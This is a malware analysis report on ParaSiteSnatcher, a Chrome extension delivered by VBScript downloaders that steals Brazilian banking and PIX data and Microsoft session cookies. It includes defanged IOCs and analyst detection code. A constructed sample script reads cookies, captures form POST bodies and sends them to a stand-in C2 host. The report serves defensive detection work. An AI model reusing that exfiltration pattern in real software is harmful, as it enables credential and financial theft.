Keypoints
- ParaSiteSnatcher is delivered by VBScript downloaders (three variants with increasing obfuscation) hosted on cloud services; the downloader checks for chrome.exe and for %APPDATA%\%USERNAME% before proceeding.
- The downloader contacts a C2 URL (e.g., hxxps://storage.googleapis[.]com/98jk3m5azb/-) to receive an obfuscated list of URLs, de-obfuscates them, and downloads malicious Chrome extension modules.
- Downloaded modules are saved to the user's application data folder, and the malware establishes persistence by removing the legitimate Chrome shortcuts and creating a custom Chrome shortcut whose launch parameters load the malicious extension every time Chrome is started through it.
- The extension uses a service worker (yyva.js) and multiple content scripts (sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js) to listen for messages, use chrome.webRequest to intercept POSTs, and exfiltrate form data, cookies, and session information.
- ParaSiteSnatcher specifically targets Brazilian banking flows (Banco do Brasil, Caixa), PIX instant payments and Boleto Bancário, harvesting CPF/CNPJ, account and transaction fields, and can programmatically initiate/modify PIX actions.
- The extension steals Microsoft account cookies to enable session hijacking and cloud pivoting, and fetches remote commands from its C2 to update behavior or exfiltrate collected data.
MITRE Techniques
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The initial downloader is delivered as VBScript variants. Source: 'ParaSiteSnatcher is downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto an infected system.'
- [T1105] Ingress Tool Transfer – The downloader retrieves additional malicious Chrome extension modules from URLs supplied by the C2 and saves them to disk. Source: 'Once the actual URLs are retrieved, they are used to download additional malicious modules masquerading as Google Chrome extensions.'
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communication and command retrieval use HTTP(S) GET/POST requests to storage.googleapis.com and other endpoints. Source: 'constructing and sending a GET request to hxxps[:]//storage.googleapis[.]com/98jk3m5azb/-'
- [T1056] Input Capture – The extension uses Chrome's webRequest API to read POSTed form submissions, capturing user input before it leaves the browser. Source: 'intercept and exfiltrate all POST requests containing sensitive account and financial information before the HTTP request initiates a transmission control protocol (TCP) connection.'
- [T1539] Steal Web Session Cookie – Content scripts collect cookies (including Microsoft live.com cookies) and forward them to the service worker, which filters them and exfiltrates them for session theft. Source: 'Stealing Microsoft cookies… send this data … to the service worker, which processes this data to filter and extract the found Microsoft account cookies.'
- [T1547.009] Boot or Logon Autostart Execution: Shortcut Modification – Persistence relies on a replaced Chrome shortcut whose launch parameters load the malicious extension each time Chrome is started through it. Source: 'creates a Google Chrome shortcut on the desktop, which is configured to launch the browser with custom startup parameters… ensure that the malicious extension is loaded each time Chrome is started via the created shortcut.'
Indicators of Compromise
- [C2 URL] C2 and payload distribution – hxxps[:]//storage.googleapis[.]com/98jk3m5azb/-, hxxps[:]//rezumdolly[.]com:8443/api/alert
- [Cloud hosts] Download hosts – Dropbox links, Google Cloud storage (used to host VBScript and payloads)
- [File names] Malicious extension and script filenames seen in samples – yyva.js, sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js (and other module names)
- [Local paths & artifacts] Persistence and installation locations – payloads saved under %APPDATA%\%USERNAME%; Chrome shortcuts removed or replaced (chrome.lnk deleted from Desktop, Public Desktop and Quick Launch, custom shortcut created)
- [Targeted URLs/Services] Banking targets and payment systems – Banco do Brasil-related URLs, Caixa Econômica Federal-related URLs, PIX and Boleto Bancário flows
ParaSiteSnatcher's technical procedure begins with cloud-hosted VBScript downloaders (three variants ranging from plain to heavily obfuscated with junk code, anti-debug/anti-tamper checks, and random identifiers). The downloader checks for the presence of Chrome (e.g., %ProgramFiles%\Google\Chrome\Application\chrome.exe) and for the user's AppData folder, then performs an HTTP GET to a C2 endpoint (example: storage.googleapis.com/98jk3m5azb/-). The C2 response is an obfuscated list of URLs; the script reverses each string and replaces markers ('[h]' → 'https://', '-' → '.', '_' → '/', '>' → ':') to reconstruct the real download links, fetches the additional modules disguised as Chrome extension components, and saves them under %APPDATA%\%USERNAME%.
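The marker table above is enough to rebuild the download list from a captured C2 response. The following is an added example, not the downloader's own code: a Node.js re-implementation of the reverse-then-substitute step as the text describes it, run against a constructed response. Assumptions made here and not stated on the page: one entry per line, each entry reversed as a whole before substitution, and the sample URLs (hosts under .invalid) are made up.

```javascript
// Added example: reconstruct download URLs from a ParaSiteSnatcher-style
// obfuscated C2 response. The marker table is the one the text describes; the
// per-line layout, the reverse-then-substitute order and the sample response
// are assumptions made for this example.
const MARKERS = [
  ['[h]', 'https://'],
  ['-', '.'],
  ['_', '/'],
  ['>', ':'],
];

// Replace every occurrence of `from` with `to` (String.replace with a string
// pattern would only touch the first match).
function replaceAll(s, from, to) {
  return s.split(from).join(to);
}

function reverseString(s) {
  return s.split('').reverse().join('');
}

// Decode one entry: reverse first, then expand the markers in table order.
// 'https://' contains none of '-', '_' or '>', so later rules cannot corrupt it.
function deobfuscateEntry(entry) {
  let s = reverseString(entry);
  for (const [marker, plain] of MARKERS) {
    s = replaceAll(s, marker, plain);
  }
  return s;
}

// Split a raw response into entries (assumed newline-separated) and decode each.
function deobfuscateList(response) {
  return response
    .split(/\r?\n/)
    .map((line) => line.trim())
    .filter((line) => line.length > 0)
    .map(deobfuscateEntry);
}

// Forward transform, used to build fixtures and to check round-tripping.
// 'https://' must be collapsed first because it contains ':' and '/'.
function obfuscateEntry(url) {
  let s = url;
  for (const [marker, plain] of MARKERS) {
    s = replaceAll(s, plain, marker);
  }
  return reverseString(s);
}

// The scheme is lossy: a URL that legitimately contains '-', '_' or '>'
// (the C2 path "98jk3m5azb/-" is one) does not survive a round trip, because
// the decoder cannot tell a literal '-' from a marker.
function roundTrips(url) {
  return deobfuscateEntry(obfuscateEntry(url)) === url;
}

// Constructed sample response: two entries, hosts under .invalid.
const SAMPLE_RESPONSE = [
  'sj-avyy_seludom_3448>dilavni-elpmaxe]h[',
  'sj-2pgpnu_dilavni-elpmaxe-ndc]h[',
].join('\n');

console.log(deobfuscateList(SAMPLE_RESPONSE));
console.log(roundTrips('https://host.invalid/98jk3m5azb/-'));
```

The round-trip check matters when hunting: module URLs recovered this way are only as trustworthy as the encoding allows, and a path containing a literal '-' or '_' will come out wrong unless the real downloader handles those characters in a way the page does not describe.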
On installation the malware removes existing Chrome shortcuts (searching for chrome.lnk in Desktop, Public Desktop and Quick Launch) and creates a crafted Chrome shortcut that launches Chrome with custom startup parameters pointing to a profile directory and to the malicious extension, so the extension loads on every browser start from that shortcut. The extension package contains a manifest.json that requests broad host_permissions and API permissions (webRequest, scripting, tabs, cookies, webNavigation, storage, declarativeNetRequest, etc.), a service worker (yyva.js) acting as the central event handler, and multiple content scripts (sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js) that together monitor tabs, intercept web requests, and perform DOM interactions.
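Two checks follow directly from this: what the replaced shortcut actually launches, and what the sideloaded manifest asks for. The block below is an added example for analysts, not code from the report or from the malware. The page does not name the switches behind "custom startup parameters"; --user-data-dir and --load-extension are real Chrome switches and are assumed here to be the ones involved. The command line and the manifest are constructed, the latter modelled on the permission list above.

```javascript
// Added example (analyst-side checks, not code from the report or the malware).
// --user-data-dir and --load-extension are real Chrome switches; that they are
// the "custom startup parameters" is an assumption. Sample data is constructed.

// Constructed shortcut arguments of the kind described.
const SAMPLE_ARGS =
  '--user-data-dir="C:\\Users\\victim\\AppData\\Roaming\\victim\\Default" ' +
  '--load-extension="C:\\Users\\victim\\AppData\\Roaming\\victim\\ext" --no-first-run';

// Parse "--name=value" switches, keeping double-quoted values intact.
function parseChromeSwitches(args) {
  const tokens = args.match(/(?:[^\s"]+|"[^"]*")+/g) || [];
  const switches = {};
  for (const tok of tokens) {
    const m = /^--([^=]+)(?:=(.*))?$/.exec(tok);
    if (!m) continue;
    switches[m[1]] = m[2] === undefined ? true : m[2].replace(/^"(.*)"$/, '$1');
  }
  return switches;
}

// Flag the launch pattern: an unpacked extension sideloaded on every launch,
// an extension directory under the user's AppData, and a non-default profile.
function shortcutFindings(args) {
  const sw = parseChromeSwitches(args);
  const findings = [];
  if (typeof sw['load-extension'] === 'string') {
    findings.push('LOAD_EXTENSION');
    // --load-extension accepts a comma-separated list of directories.
    const dirs = sw['load-extension'].split(',');
    if (dirs.some((d) => /\\AppData\\/i.test(d))) findings.push('EXTENSION_UNDER_APPDATA');
  }
  if (typeof sw['user-data-dir'] === 'string') findings.push('CUSTOM_USER_DATA_DIR');
  return { switches: sw, findings };
}

// Host patterns that reach every origin. MV2 listed hosts in `permissions`;
// MV3 moved them to `host_permissions`, so both fields are checked.
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function manifestFindings(manifest) {
  const perms = new Set(manifest.permissions || []);
  const hosts = [...(manifest.host_permissions || []), ...perms];
  const broad = hosts.some((h) => BROAD_HOSTS.has(h));
  const scripts = manifest.content_scripts || [];
  const broadScripts = scripts.some((cs) => (cs.matches || []).some((m) => BROAD_HOSTS.has(m)));
  const findings = [];
  if (broad) findings.push('BROAD_HOSTS');
  if (broad && perms.has('webRequest')) findings.push('WEBREQUEST_BROAD'); // sees every request, bodies included
  if (broad && perms.has('cookies')) findings.push('COOKIES_BROAD');       // reads any site's session cookies
  if ((broad && perms.has('scripting')) || broadScripts) findings.push('DOM_ACCESS_BROAD'); // injects into any page
  if (perms.has('declarativeNetRequest')) findings.push('CAN_REWRITE_TRAFFIC');
  return findings;
}

// Constructed manifest modelled on the permission set the text lists.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'sample',
  version: '1.0',
  permissions: ['webRequest', 'scripting', 'tabs', 'cookies', 'webNavigation', 'storage', 'declarativeNetRequest'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'yyva.js' },
  content_scripts: [{ matches: ['<all_urls>'], js: ['sovvy.js', 'jsync.js', '33nhauh.js', 'unpgp2.js', 's12ih0a.js'] }],
};

console.log(shortcutFindings(SAMPLE_ARGS).findings);
console.log(manifestFindings(SAMPLE_MANIFEST));
```

Neither finding set is proof of malice on its own: plenty of legitimate extensions request <all_urls>, and developers sideload with --load-extension. The combination that matters here is a replaced user-facing shortcut that sideloads an extension from AppData whose manifest pairs webRequest and cookies with all-origin host access.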
Operationally, the service worker uses chrome.runtime.onMessage and chrome.webRequest.onBeforeRequest to listen for navigation/focus/getcookie events and to capture POST request payloads before transmission; sovvy.js polls pages, sets listeners, and handles message types such as 'lixo' (catch-all POST capture) and 'cookie' (session/cookie theft). Other scripts implement AJAX exfiltration (jsync.js), banking-specific automation and PIX actions (33nhauh.js), Caixa interactions (unpgp2.js), and Boleto/CPF-CNPJ monitoring (s12ih0a.js). Collected data (form fields, CPF/CNPJ, PIX keys, account details, Microsoft live.com cookies, and more) is packaged and posted back to attacker-controlled endpoints, and the extension can also fetch remote commands from the C2 to update its behavior or trigger transactions.
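When the extension directory is recovered from disk, the capabilities described above can be confirmed statically before anything is executed. The block below is an added example for analysts, not code from the report or the malware: a small rule set that scans extension JavaScript for the request-body hook, cookie reads, the message bus that joins content scripts to the service worker, and HTTP egress, then pulls out hard-coded URLs as network indicators. The sample source it scans is constructed to mirror the pattern the text describes (host under .invalid), not taken from the real modules.

```javascript
// Added example (analyst-side static triage, not code from the report or the
// malware). The sample source is constructed to show the described pattern.
const SAMPLE_SOURCE = `
chrome.runtime.onMessage.addListener((msg, sender, reply) => {
  if (msg.type === 'cookie') {
    chrome.cookies.getAll({ domain: 'live.com' }, (cs) => post('/api/alert', cs));
  }
});
chrome.webRequest.onBeforeRequest.addListener(
  (d) => { if (d.method === 'POST') post('/api/alert', d.requestBody); },
  { urls: ['<all_urls>'] }, ['requestBody']);
function post(path, data) {
  fetch('https://c2.example.invalid:8443' + path, { method: 'POST', body: JSON.stringify(data) });
}
`;

// Each rule: capability name, the pattern that establishes it, and what an
// analyst should read into a hit.
const RULES = [
  ['REQUEST_BODY_CAPTURE',
    /webRequest\s*\.\s*onBeforeRequest\s*\.\s*addListener[\s\S]*?["']requestBody["']/,
    'reads outgoing request bodies before the connection is made'],
  ['COOKIE_READ',
    /chrome\s*\.\s*cookies\s*\.\s*(getAll|get)\s*\(/,
    'reads cookies, i.e. live session tokens'],
  ['MESSAGE_BUS',
    /runtime\s*\.\s*onMessage\s*\.\s*addListener/,
    'content scripts report to a central handler'],
  ['HTTP_EGRESS',
    /\b(fetch|XMLHttpRequest|sendBeacon)\b/,
    'can send collected data to a remote host'],
];

// Return the capabilities whose pattern appears in the source.
function scanSource(src) {
  return RULES.filter(([, re]) => re.test(src)).map(([name, , note]) => ({ name, note }));
}

// Pull out hard-coded URLs so they can be turned into network indicators.
function extractUrls(src) {
  return Array.from(new Set(src.match(/https?:\/\/[^\s'"`)]+/g) || []));
}

console.log(scanSource(SAMPLE_SOURCE).map((f) => f.name));
console.log(extractUrls(SAMPLE_SOURCE));
```

Regex rules only catch code written plainly. The heavier modules may be minified or use computed property access (for example chrome["webRequest"]) or string concatenation for the C2 host, which defeats these patterns; a miss from this scan is not a clean result, and a dynamic run in an instrumented browser is the fallback.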